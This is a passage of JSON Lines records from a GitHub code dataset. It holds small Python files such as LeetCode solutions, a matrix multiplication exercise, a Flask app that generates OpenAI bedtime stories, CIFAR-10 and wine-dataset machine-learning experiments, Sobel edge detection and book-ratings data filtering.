List[np.ndarray]:\n (s_count, c_count) = group_count(metadata)\n\n LOG(f\"Initial (schz, control): {s_count}, {c_count}\")\n\n if s_count == c_count:\n # classes are balanced\n LOG(\"Classes are already balanced. Aborting balancing.\")\n\n return subjects\n\n delta = abs(s_count - c_count)\n op_map = operation_map(delta)\n\n diagnosis = 'CONTROL' if s_count > c_count else 'SCHZ'\n\n LOG(f\"Generating {delta} more {diagnosis}\")\n \n sample = [subj for subj in subjects.subjects if subj.diagnosis == diagnosis]\n sample = choices(sample, k=delta)\n\n # From now on, we will use raw data only\n subjects = [subj.load_anat('space-MNI152NLin2009cAsym_preproc') for subj in subjects.subjects]\n\n for i in range(0, delta):\n operation = op_map[i]\n\n image = sample[i].load_anat('space-MNI152NLin2009cAsym_preproc').get_data()\n image = OP_LIST[operation](image)\n\n sample[i] = image\n\n return subjects + sample\n \n\ndef operation_map(length: int) -> np.ndarray:\n \"\"\"\n Generates a operation map with length `length`.\n\n A operation map is a integer array where each\n number (0, 1, 2) represents a different operation.\n\n This map is randomly ordered and uniformly distributed.\n \"\"\"\n\n return np.random.randint(0, 3, length, dtype=np.int8)\n\n\ndef group_count(metadata: pd.DataFrame) -> (int, int):\n \"\"\"\n Returns the counts of schizophrenics and controls\n in the given subjects `metadata`.\n \"\"\"\n\n schz = metadata[metadata['diagnosis'] == 'SCHZ']\n control = metadata[metadata['diagnosis'] == 'CONTROL']\n\n return (len(schz), len(control))","repo_name":"naccib/projects","sub_path":"preprocessing.old/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17087262771","text":"class Solution:\n def climbStairs(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n list = [1, 2];\n for i in range(2, n, 1):\n list.append(list[i - 2] + list[i - 1]);\n return list[n - 1];\n ","repo_name":"yychuyu/LeetCode","sub_path":"problems/0070_Climbing_Stairs/linlijia.py","file_name":"linlijia.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"34"} +{"seq_id":"1547159546","text":"def sort_n(arr):\n # when we store all sorted elements\n new_arr = []\n\n # taking the \"min & max & mid\" in array \"with\" thier \"indexes\"\n min = {\"value\": 0, \"index\": 0}\n mid = {\"value\": 0, \"index\": 0}\n max = {\"value\": 0, \"index\": 0}\n\n # loop over all \"one by one\"\n for i in range(len(arr)):\n\n # when we start\n if i == 0:\n # set element 0 in array as min\n min[\"index\"] = i\n min[\"value\"] = arr[i]\n\n # set element 0 in array as mid\n mid[\"index\"] = i\n mid[\"value\"] = arr[i]\n\n # set element 0 in array as max\n max[\"index\"] = i\n max[\"value\"] = arr[i]\n\n # append first one direct to the new array\n new_arr.append(arr[i])\n\n # in case element smaller or equal min\n elif arr[i] <= min[\"value\"]:\n\n # insert new min at position 0\n new_arr.insert(min[\"index\"], arr[i])\n\n # set new min\n min[\"value\"] = arr[i]\n # update max position\n max[\"index\"] += 1\n # max[\"index\"] = new_arr.index(max[\"value\"])\n\n # in case element bigger or equal max\n elif arr[i] >= max[\"value\"]:\n # push new max in \"new array\"\n new_arr.insert(max[\"index\"]+1, arr[i])\n\n # set new max\n max[\"index\"] += 1\n # max[\"index\"] = new_arr.index(arr[i])\n max[\"value\"] = arr[i]\n\n # in case element between min & max\n else:\n # in case mid in 0\n if mid[\"index\"] == 0:\n\n # insert element at position => (max - (min / 2) )\n new_arr.insert(int(max[\"index\"] - (min[\"index\"]/2)), arr[i])\n\n # set new mid\n mid[\"index\"] = i\n mid[\"value\"] = arr[i]\n\n # update max position\n max[\"index\"] += 1\n # max[\"index\"] = new_arr.index(max[\"value\"])\n\n # in case mid less than or equal element\n elif mid[\"value\"] <= arr[i]:\n\n # insert in new array in mid position\n new_arr.insert(mid[\"index\"], arr[i])\n\n # update max position\n max[\"index\"] += 1\n # max[\"index\"] = new_arr.index(max[\"value\"])\n\n # in case mid greather than or equal element\n elif mid[\"value\"] >= arr[i]:\n\n # insert at (index + 1) position\n new_arr.insert(mid[\"index\"]+1, arr[i])\n\n # update max position\n max[\"index\"] += 1\n # max[\"index\"] = new_arr.index(max[\"value\"])\n\n # return sorted array\n return new_arr\n\n\narr = [100, 7, 4, 5, 3, 13, 2, 1]\n\nprint(\"== output ==\")\nprint(sort_n(arr))\n","repo_name":"mohammed412/problem-solving","sub_path":"try_sort_o(n).py","file_name":"try_sort_o(n).py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16462816888","text":"first_string = input().split(', ')\nsecond_string = input().split(', ')\n\nsubstrings = []\n\nfor string in first_string:\n for word in second_string:\n if string in word:\n substrings.append(string)\n break\n\nprint(substrings)\n\n# OR ------------------------------\n\n\ndef substrings_check(first_str, second_str):\n substrings = []\n\n for string in first_str:\n for word in second_str:\n if string in word:\n substrings.append(string)\n break\n return substrings\n\n\nfirst_string = input().split(', ')\nsecond_string = input().split(', ')\nprint(substrings_check(first_string, second_string))\n\n# OR --------------------------------------------------------------\n\nfirst_string = input().split(', ')\nsecond_string = input().split(', ')\n\nsubstrings = [first_word for first_word in first_string if any(first_word in second_word for second_word in second_string)]\n\nprint(substrings)","repo_name":"Mikeeyh/softuni_fundamentales_exercices","sub_path":"exercices_5_lists_advanced/which_are_in.py","file_name":"which_are_in.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29655157975","text":"#!/usr/bin/pythom3\n\"\"\"\nModule - 100-matrix_mul\n\n\"\"\"\n\n\ndef matrix_mul(m_a, m_b):\n if type(m_b) is not list:\n raise TypeError(\"m_b must be a list\")\n if type(m_a) is not list:\n raise TypeError(\"m_a must be a list\")\n if len(m_a) == 0 or len(m_b) == 0 or m_a == [[]] or m_b == [[]]:\n raise ValueError(\"m_a can't be empty or m_b can't be empty\")\n\n for row in m_a:\n for i in row:\n if not isinstance(i, (int, float)):\n raise TypeError(\"m_a should contain only integers or floats\")\n if len(row) != len(m_a[0]):\n raise TypeError(\"each row of m_a must be of the same size\")\n if len(row) != len(m_b[0]):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n\n for row in m_b:\n for i in row:\n if not isinstance(i, (int, float)):\n raise TypeError(\"m_a should contain only integers or floats\")\n if len(row) != len(m_b[0]):\n raise TypeError(\"each row of m_a must be of the same size\")\n n_matrix = []\n i = 0\n lists = []\n for row1 in range(len(m_a)):\n lists = []\n for col1 in range(len(m_b)):\n for element in range(len(m_a[0])):\n i += m_a[row1][element] * m_b[element][col1]\n lists.append(i)\n i = 0\n n_matrix.append(lists)\n return n_matrix\n","repo_name":"Benonking/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/100-matrix_mul.py","file_name":"100-matrix_mul.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40738692345","text":"import os\n\nimport openai\nfrom flask import Flask, json, redirect, render_template, request, url_for\n\napp = Flask(__name__)\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\n@app.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n if request.method == \"POST\":\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=generate_story_prompt(\n request.form[\"main-character\"],\n request.form[\"second-character\"],\n request.form[\"theme\"],\n request.form[\"age\"],\n ),\n )\n result = json.loads(response.choices[0].message.content)\n for (i, chapter) in enumerate(result):\n print(\"Generating image for: \", chapter)\n\n response = openai.Image.create(\n prompt=chapter[\"img_prompt\"],\n n=1,\n size=\"1024x1024\"\n )\n img_url = response['data'][0]['url']\n result[i][\"img_url\"] = img_url\n print(\"result: \", result)\n return redirect(url_for(\"story\", chapter=1, data=json.dumps(result)))\n\n result = request.args.get(\"result\")\n img_result = request.args.get(\"img_result\")\n return render_template(\"index.html\", result=result, img_result=img_result)\n\n\n@ app.route(\"/story\", methods=[\"GET\"])\ndef story():\n data = json.jsonify(request.args.get(\"data\"))\n chapter = request.args.get(\"chapter\")\n return render_template(\"story.html\", chapter=chapter, data=data)\n\n\n@ app.route(\"/img\", methods=[\"POST\"])\ndef img():\n print(\"/img request json: \", request.json)\n if request.method == \"POST\":\n input = request.json[\"result\"]\n response = openai.Image.create(\n prompt=input,\n n=1,\n size=\"1024x1024\"\n )\n img_url = response['data'][0]['url']\n response = app.response_class(\n response=json.dumps({\"img_url\": img_url}),\n status=200,\n mimetype='application/json'\n )\n return response\n\n\ndef generate_story_prompt(main_character, second_character, theme, age):\n return [\n {\"role\": \"system\", \"content\": \"You are a story teller,\\\n that tells engaging bed time stories.\"},\n\n {\"role\": \"user\", \"content\":\n \"Tell me a bed time story with \" + main_character +\n \" as the main character and \" +\n second_character + \" as the second character.\\\n The story should be about \" + theme +\n \" and for someone who is \" + age + \" years old.\\\n Split it into 5 chapters and give a very detailed prompt\\\n for generating an image with DALLE for each chapter.\\\n The prompts should be related to each other and the story.\\\n The output should be a json in the following format:\\\n [{\\\"chapter\\\": 1, \\\"text\\\": \\\"the text of the chapter\\\",\\\n \\\"img_prompt\\\": \\\"The prompt for generating an image\\\" }, ...]\"\n },\n ]\n","repo_name":"thomsan/gpt4-bedtime-stories","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16445401869","text":"\"\"\" The file provides the network ip address, works with py 2 and 3. and need external package \"\"\"\nfrom netifaces import interfaces, ifaddresses, AF_INET\n\ndef get_ip_address(ifname):\n \"\"\" Method will provide the ip address for an interface. \"\"\"\n try:\n for ifaceName in interfaces():\n if ifaceName == ifname :\n addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr':'No IP addr'}] )]\n return addresses[0]\n\n return 'Unable to find NIC.'\n\n except:\n return 'Unable to find IP(Execption).'\n\n\n# Test code.\n#ip = get_ip_address('eno1')\n#ip = get_ip_address('wlan0')\n#print (ip)\n","repo_name":"georgerahul/Ethernet-Ip-address-logger-for-linux","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20667281550","text":"#Defining a function that creates a tuple and then returns that tuple\ndef steps():\n likelihoods = [(\"step 1\", 50), (\"step 2\", 38), (\"step 3\", 27), (\"step 4\", 99), (\"step 5\", 4)]\n\n\n return likelihoods\n\n #Defining a function that first creates a local variable which will store the \"likelihood\" tuple\n\ndef run():\n\n #storing the likelihoods tuple in steps\n\n all_steps = steps()\n\n #Creating two empty lists\n\n good_steps = []\n bad_steps = []\n \n #A for loop that for every step in steps it will check if the step in the current position is equal or less to 50 if it is then it will be added to the bad steps list and if it isn't it will be added to the good steps list\n for step in all_steps:\n if (step[1] >= 50):\n bad_steps.append(step)\n else:\n good_steps.append(step) \n\n print(f\"Good steps: {len(good_steps)}, Bad steps: {len(bad_steps)}\")\n\nrun()\n","repo_name":"SaphiraFord/com411","sub_path":"data/tuples/nested_tuple.py","file_name":"nested_tuple.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30574473417","text":"from keras.datasets import cifar10\nfrom src.cnn_profiler import CNNProfiler\nfrom src.configs.network_configs.cifar.network_config_2 import NETWORK_STRUCTURE, NETWORK_ANCHOR, NETWORK_PATH, INIT, LEARNING_RATE\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom src.distribution import Distribution\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nX_train = X_train.astype(\"float32\")\nX_train /= 255\nX_test = X_test.astype(\"float32\")\nX_test /= 255\ncnn_profiler = CNNProfiler(NETWORK_STRUCTURE, network_anchor=NETWORK_ANCHOR, network_path=NETWORK_PATH, init=INIT, lr=LEARNING_RATE)\n################## Train ######################\ndef train():\n\n x = X_train.astype(\"float32\")\n print(X_train)\n y = y_train.reshape(-1)\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n cnn_profiler.train([None, 32, 32, 3], [None, 10], x, y, iter=6000)\n################## Test ########################\ndef test():\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n cnn_profiler.test([None, 32, 32, 3], [None, 10], x[:2000], y[:2000])\n################## Correct Vector ###################\ndef get_mid(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n mid = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x)\n return mid\ndef get_correct_mid(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n y = y[y == label]\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n print(y.shape)\n return cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], x, y)\n################# Pertubation Test ####################\ndef pertubation_test(label, pertubation):\n def pertubate_img(img, pertubation):\n img_p = np.array(img)\n img_p += pertubation\n img_p[img_p>1]=1\n img_p[img_p<0]=0\n return img_p\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x_ori = x[y == label][1]\n print(x_ori.shape)\n x_ptb = pertubate_img(x_ori,pertubation)\n # x_ptb = x[y == (label+1)][0]\n plt.subplot(211)\n plt.imshow( x_ori)\n plt.subplot(212)\n plt.imshow( x_ptb)\n # plt.show()\n cnn_profiler.test([None, 32, 32, 3], [None, 10], x_ptb)\n ori_vec = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x_ori)\n ptb_vec = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x_ptb)\n np.savetxt(\"profile/cifar/%s.txt\" % str(label)+\"_ori\", ori_vec, fmt=\"%.4f\")\n np.savetxt(\"profile/cifar/%s.txt\" % str(label)+\"_ptb\", ptb_vec, fmt=\"%.4f\")\n thres = 1e-2\n same = np.where(ori_vec-ptb_vec<=thres)\n diff = np.where(ori_vec-ptb_vec>=thres)\n print(same[1].shape, diff[1].shape)\n return diff[1]\n# final_diff = None\n# for i in range(-100,100,10):\n# print(i)\n# if i==0:\n# continue\n# diff = pertubation_test(6, i)\n# if final_diff is None:\n# final_diff = diff\n# else:\n# final_diff = np.intersect1d(final_diff, diff)\n# print(final_diff.shape)\n# print(final_diff)\n################# Gaussian Check ####################\ndef gaussian_check(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n n, p = cnn_profiler.gaussian_check([None, 32, 32, 3], [None, 10], x)\n thres=1e-3\n p_normal = np.where(p>thres)[0]\n print(p_normal)\n return p_normal\n################# Mahanobis Distance #################\ndef small_rate(data, range):\n data_in_range = data[data <= range]\n rate = len(data_in_range) / len(data)\n return rate\n\n\ndef test_m_distance(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n y = y[y == label]\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n print(y)\n correct = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], x, y)\n distribute_correct = Distribution(correct)\n own_dis = []\n for i in range(correct.shape[0]):\n dis = distribute_correct.mahanobis_distance(correct[i])\n own_dis.append(dis)\n own_dis = np.array(own_dis)\n print(own_dis)\n print(own_dis.max())\n print(own_dis.mean())\n xx = X_test.astype(\"float32\")\n yy = y_test.reshape(-1)\n xx = xx[yy == label]\n yy = yy[yy == label]\n values = yy\n n_values = 10\n yy = np.eye(n_values)[values]\n correct_test = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], xx, yy)\n wrong_test = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], xx, yy, wrong=True)\n test_correct_dis = []\n for i in range(correct_test.shape[0]):\n dis = distribute_correct.mahanobis_distance(correct_test[i])\n test_correct_dis.append(dis)\n test_correct_dis = np.array(test_correct_dis)\n test_wrong_dis = []\n for i in range(wrong_test.shape[0]):\n dis = distribute_correct.mahanobis_distance(wrong_test[i])\n test_wrong_dis.append(dis)\n test_wrong_dis = np.array(test_wrong_dis)\n print(test_correct_dis)\n print(test_correct_dis.max())\n print(test_correct_dis.mean())\n print(test_wrong_dis)\n print(test_wrong_dis.max())\n print(test_wrong_dis.mean())\n x_another = X_train.astype(\"float32\")\n y_another = y_train.reshape(-1)\n x_another = x_another[y_another == label + 2]\n y_another = y_another[y_another == label + 2]\n mid = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x_another)\n another_dis = []\n for i in range(mid.shape[0]):\n dis = distribute_correct.mahanobis_distance(mid[i])\n another_dis.append(dis)\n another_dis = np.array(another_dis)\n print(another_dis)\n print(another_dis.max())\n print(another_dis.mean())\n\ndef test_with_filter(label):\n anchor=-2\n filter=None\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n y = y[y == label]\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n correct = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], x, y, anchor=anchor,filter=filter)\n distribute_correct = Distribution(correct)\n own_dis = []\n for i in range(correct.shape[0]):\n dis = distribute_correct.mahanobis_distance(correct[i])\n own_dis.append(dis)\n own_dis = np.array(own_dis)\n # print(own_dis)\n print(own_dis.min())\n print(own_dis.max())\n print(own_dis.mean())\n x = X_test.astype(\"float32\")\n y = y_test.reshape(-1)\n x = x[y != label][:2000]\n y = y[y != label][:2000]\n wrong_test, pic = cnn_profiler.get_mid_by_label([None, 32, 32, 3], [None, 10], x, y, label, anchor=anchor,filter=filter)\n logits, pic = cnn_profiler.get_mid_by_label([None, 32, 32, 3], [None, 10], x, y, label, anchor=-1)\n pic = pic.reshape(32,32,3)\n plt.imshow(pic)\n plt.show()\n print(logits)\n test_wrong_dis = []\n for i in range(wrong_test.shape[0]):\n dis = distribute_correct.mahanobis_distance(wrong_test[i])\n test_wrong_dis.append(dis)\n test_wrong_dis = np.array(test_wrong_dis)\n # print(test_correct_dis)\n print(test_wrong_dis)\n print(test_wrong_dis.min())\n print(test_wrong_dis.max())\n print(test_wrong_dis.mean())\n print(small_rate(test_wrong_dis,200))\ntest_with_filter(3)\n\n\n\n\n\n\n\n\n\n","repo_name":"luhc300/DeepDiff","sub_path":"src/cifar_test/cifar_test.py","file_name":"cifar_test.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32934964640","text":"import time\n\n\n__version__= \"$Id: timekeeper.py 25 2018-01-26 19:00:40Z lbusoni $\"\n\n\nclass TimeKeeper(object):\n\n def __init__(self, interval=1.0, timeMod=time):\n self.interval = interval\n self.t0= timeMod.time()\n self.cnt = 0\n\n def inc(self):\n self.cnt +=1\n t1 = time.time()\n if (t1 - self.t0)>=self.interval:\n tdiff = t1 - self.t0\n self.rate = self.cnt / tdiff\n self.count = self.cnt\n self.ms = 1.0 / self.rate * 1e3\n self.cnt=0\n self.t0=t1\n return True\n return False\n","repo_name":"ArcetriAdaptiveOptics/plico","sub_path":"plico/utils/timekeeper.py","file_name":"timekeeper.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36096344099","text":"# -*- coding:utf-8 -*-\nfrom src.Client.Conf.config import *\n\n\nclass EditMissionList():\n \"\"\"\n 负责编辑任务,实际操作类\n \"\"\"\n def edit(self, list, missionId, bookName=None, missionRange=None, nextTime=None, state=None, loopTime=None,\n isFinish=None):\n \"\"\"\n 编辑任务\n :param list: 目标list\n :param missionId: 任务id(string\n :param bookName: 书名\n :param missionRange: 任务范围\n :param nextTime: 下次任务时间\n :param state: 任务状态\n :param loopTime: 剩余迭代次数\n :param isFinish: 任务是否完成\n :return: 插入后的list\n \"\"\"\n # 首先将列表备份,以便添加失败时返回最近正常的点\n backupList = list[:]\n try:\n # 转换任务id,防御编程\n missionId = str(missionId).zfill(6)\n # 遍历任务列表寻找目标任务\n for each in list:\n if each['missionId'] == missionId:\n # 对目标任务进行更新\n if bookName != None:\n each['bookName'] = bookName\n if missionRange != None:\n each['missionRange'] = missionRange\n if nextTime != None:\n each['nextTime'] = nextTime\n if state != None:\n each['state'] = state\n if loopTime != None:\n each['loopTime'] = loopTime\n if isFinish != None:\n each['isFinish'] = isFinish\n # 打印debug日志\n if DEBUG and MISSION_DEBUG:\n print('{SYS}{MISSION_DEBUG} mission has been edit finish successfully id is ' + missionId)\n\n return list\n except Exception as e:\n # 打开错误日志文件\n wrongFile = open('data/wrongMessage.dat', 'a+')\n # 获取当前时间\n currentTime = str(datetime.datetime.strptime(time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime()),\n '%Y-%m-%d-%H-%M-%S'))\n # 生成报错的错误信息\n wrongMessage = {\n '|currentTime': currentTime,\n '|file': 'MissionSystem-EditMission-editMissionList',\n '|list': list,\n '|missionId': missionId,\n '|bookName': bookName,\n '|missionRange': missionRange,\n '|nextTime': nextTime,\n '|state': state,\n '|loopTime': loopTime,\n '|isFinish': isFinish,\n '|wrongMessage': str(e)\n }\n # 存入文件\n wrongFile.write(str(wrongMessage))\n # 增加换行符\n wrongFile.write('\\n')\n wrongFile.close()\n return backupList\n\n","repo_name":"Sniper970119/MemoryAssistInPython","sub_path":"src/Client/MissionSystem/EditMission/tools/editMissionList.py","file_name":"editMissionList.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"34"} +{"seq_id":"35490063872","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom sklearn.preprocessing import scale\nfrom matplotlib import pyplot as plt\nfrom numpy import array, average\n\nwith open(\"wine.data\", \"r\") as f:\n data = f.read().splitlines()\n\nlabels = []\nfeatures = []\n\nfor record in data:\n labels.append(record.split(',')[0])\n features.append(record.split(',')[1:])\n\nfeatures = array(features).astype('float')\nfeatures_scaled = array(scale(features)).astype('float')\nlabels = array(labels).astype('float')\n\n#trainX, testX, trainY, testY = train_test_split(features, labels, test_size=0.25)\ncv_scores = []\nfor k in range(1, 51):\n knn = KNeighborsClassifier(n_neighbors=k)\n kf = KFold(n_splits=5, shuffle=True, random_state=42)\n scores = cross_val_score(knn, features, labels, cv=kf, scoring='accuracy')\n cv_scores.append(scores.mean())\n \nplt.plot(list(range(1, 51)), cv_scores)\na = max(cv_scores)\nb = cv_scores.index(max(cv_scores)) + 1\nprint(a, b)\n\nwith open('file', \"w\") as f:\n #f.write(\"{}\".format(round(a, 2)))\n f.write(\"{}\".format(b))\n\nplt.show()\n","repo_name":"nik31096/coursera_intro_ml","sub_path":"coursera_yandex_hse/coursera_ml_knn_wine.py","file_name":"coursera_ml_knn_wine.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13876928003","text":"import math\nfrom PIL import Image\n\nfrom cinza import cinza\n\nVERTICAL_KERNEL = [\n [1, 2, 1],\n [0, 0, 0],\n [-1, -2, -1]\n]\nHORIZONTAL_KERNEL = [\n [-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1]\n]\n\n# Transform image in grayscale\nimg = cinza(Image.open(\"./img/baloes.jpg\"))\nimg_width = img.width\nimg_height = img.height\n\n# Output image\noutput_img = Image.new(\"L\", (img_width, img_height))\n\n\ndef get_modified_pixel(x, y, dir_kernel, offset=0):\n acc = 0\n\n # Getting window pixels\n for i, k in enumerate(range(x - 1, x + 2)):\n for j, m in enumerate(range(y - 1, y + 2)):\n if k < 0 or m < 0 or k >= img_width or m >= img_height:\n continue\n\n # Getting kernel value in current position\n cur_kernel_value = dir_kernel[i][j]\n \n if cur_kernel_value == 0:\n continue\n\n pixel = img.getpixel((k, m))[0]\n\n result = pixel * cur_kernel_value\n\n acc += result\n\n return acc\n\n\nfor x in range(img_width):\n for y in range(img_height):\n # Horizontal edges\n gx = get_modified_pixel(x, y, HORIZONTAL_KERNEL)\n # Vertical edges\n gy = get_modified_pixel(x, y, VERTICAL_KERNEL)\n\n g = int(math.sqrt(gx ** 2 + gy ** 2))\n\n output_img.putpixel((x, y), g)\n\noutput_img.save(\"./img/resultado.jpg\")\n\n# x - 1, y - 1 || x - 1, y || x - 1, y + 1\n# x, y - 1 || x, y || x, y + 1\n# x + 1, y - 1 || x + 1, y || x + 1, y + 1","repo_name":"AlexdeJesusFS/APS--Processamento-de-Imagem","sub_path":"Project/deteccao_bordas.py","file_name":"deteccao_bordas.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2601082845","text":"#!/usr/bin/env python\n# -*- coding: iso-8859-1 -*-\n\nfrom setuptools import setup, find_packages\n\nPACKAGE = 'TracUnixGroups'\nVERSION = '0.11'\n\nsetup(\n name = PACKAGE,\n version = VERSION,\n\n packages = find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data = True,\n\n author = \"Vadim Zaliva\",\n author_email = \"lord@crocodile.org\",\n description = \"TracUnixGroups - use system group membership in trac.\",\n long_description = \"The TracUnixGroups plugin allows Trac to use the\" \\\n \" OS group membership for permissions assignment.\",\n license = \"BSD\",\n keywords = \"trac group permission plugin\",\n url = \"http://trac-hacks.org/wiki/TracUnixGroupsPlugin\",\n\n entry_points = {\n 'trac.plugins': [\n '%s = %s' % (PACKAGE, 'unixgroups')\n ],\n },\n\n zip_safe = True\n)\n","repo_name":"woochica/trachacks","sub_path":"tracunixgroupsplugin/anyrelease/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"24476544694","text":"from collections import deque\n\nN = int(input())\nboard = []\nfor _ in range(N):\n board.append(list(map(int, input().split())))\n\nwater_height = 0\nresult = 0\n\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0 ,0]\n\ndef bfs(pos, visited):\n global water_height\n x, y = pos\n q = deque()\n q.append((x, y))\n visited[x][y] = True\n while q:\n x, y = q.popleft()\n for i in range(4):\n ax = x + dx[i]\n ay = y + dy[i]\n if 0<=ax water_height and not visited[ax][ay]:\n visited[ax][ay] = True\n q.append((ax, ay))\n\n\nq = deque()\nwhile True:\n visited = [[False for _ in range(N)] for _ in range(N)]\n count = 0\n for i in range(N):\n for j in range(N):\n if board[i][j] > water_height and not visited[i][j]:\n bfs((i, j), visited)\n count += 1\n if count > result:\n result = count\n if count == 0:\n break \n water_height += 1\n \n \nprint(result)","repo_name":"HOYE0NG/algorithm","sub_path":"BFS+DFS/boj2468.py","file_name":"boj2468.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13135079803","text":"class Solution(object):\n def isIsomorphic(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if len(s) != len(t):\n return False\n else:\n i = 0\n ref_dict = {}\n isomorphic_str = \"\"\n while i < len(s):\n if s[i] in ref_dict:\n isomorphic_str += ref_dict[s[i]]\n elif t[i] in ref_dict.values():\n isomorphic_str += s[i]\n else:\n ref_dict[s[i]] = t[i]\n isomorphic_str += ref_dict[s[i]]\n i += 1\n return True if isomorphic_str == t else False \n","repo_name":"amoghlale/Leetcode","sub_path":"Solutions/IsomorphicStrings.py","file_name":"IsomorphicStrings.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3263576040","text":"from pathlib import Path\n\nimport click\nimport pandas as pd\n\n\ndef read_books(path=\"data/01_raw/books_data.csv\"):\n books = pd.read_csv(path)\n return books\n\n\ndef read_ratings(path=\"data/01_raw/Books_rating.csv\"):\n ratings = pd.read_csv(path)\n return ratings\n\n\ndef filter_data(\n ratings,\n books,\n remove_no_description=True,\n remove_no_publisher=True,\n remove_no_author=True,\n remove_no_title=True,\n remove_no_category=True,\n):\n if remove_no_description:\n books = books[books[\"description\"].notna()]\n if remove_no_publisher:\n books = books[books[\"publisher\"].notna()]\n if remove_no_author:\n books = books[books[\"authors\"].notna()]\n if remove_no_title:\n books = books[books[\"Title\"].notna()]\n if remove_no_category:\n books = books[books[\"categories\"].notna()]\n books = books.join(\n ratings[[\"Id\", \"Title\"]].drop_duplicates().set_index(\"Title\"),\n on=\"Title\",\n how=\"inner\",\n )\n ratings = ratings[ratings[\"User_id\"].notna()]\n\n books = books[books[\"Title\"].isin(ratings[\"Title\"])]\n ratings = ratings[ratings[\"Title\"].isin(books[\"Title\"])]\n books = books[books[\"Id\"].isin(ratings[\"Id\"])]\n ratings = ratings[ratings[\"Id\"].isin(books[\"Id\"])]\n return ratings, books\n\n\ndef split_data_by_books(\n ratings, books, train=0.7, validation=0.2, test=0.1, seed=42, fraction=1.0\n):\n if abs(1 - (train + validation + test)) > 1e-5:\n raise ValueError(\"Train, validation and test sizes must sum to 1\")\n ratings = ratings[[\"Id\", \"User_id\", \"review/score\"]]\n ratings = ratings.rename(\n columns={\"Id\": \"book_id\", \"User_id\": \"user_id\", \"review/score\": \"score\"}\n )\n books = books[\n [\"Id\", \"Title\", \"authors\", \"description\", \"publisher\", \"categories\", \"image\"]\n ]\n books = books.rename(\n columns={\n \"Id\": \"book_id\",\n \"Title\": \"title\",\n \"authors\": \"authors\",\n \"description\": \"description\",\n 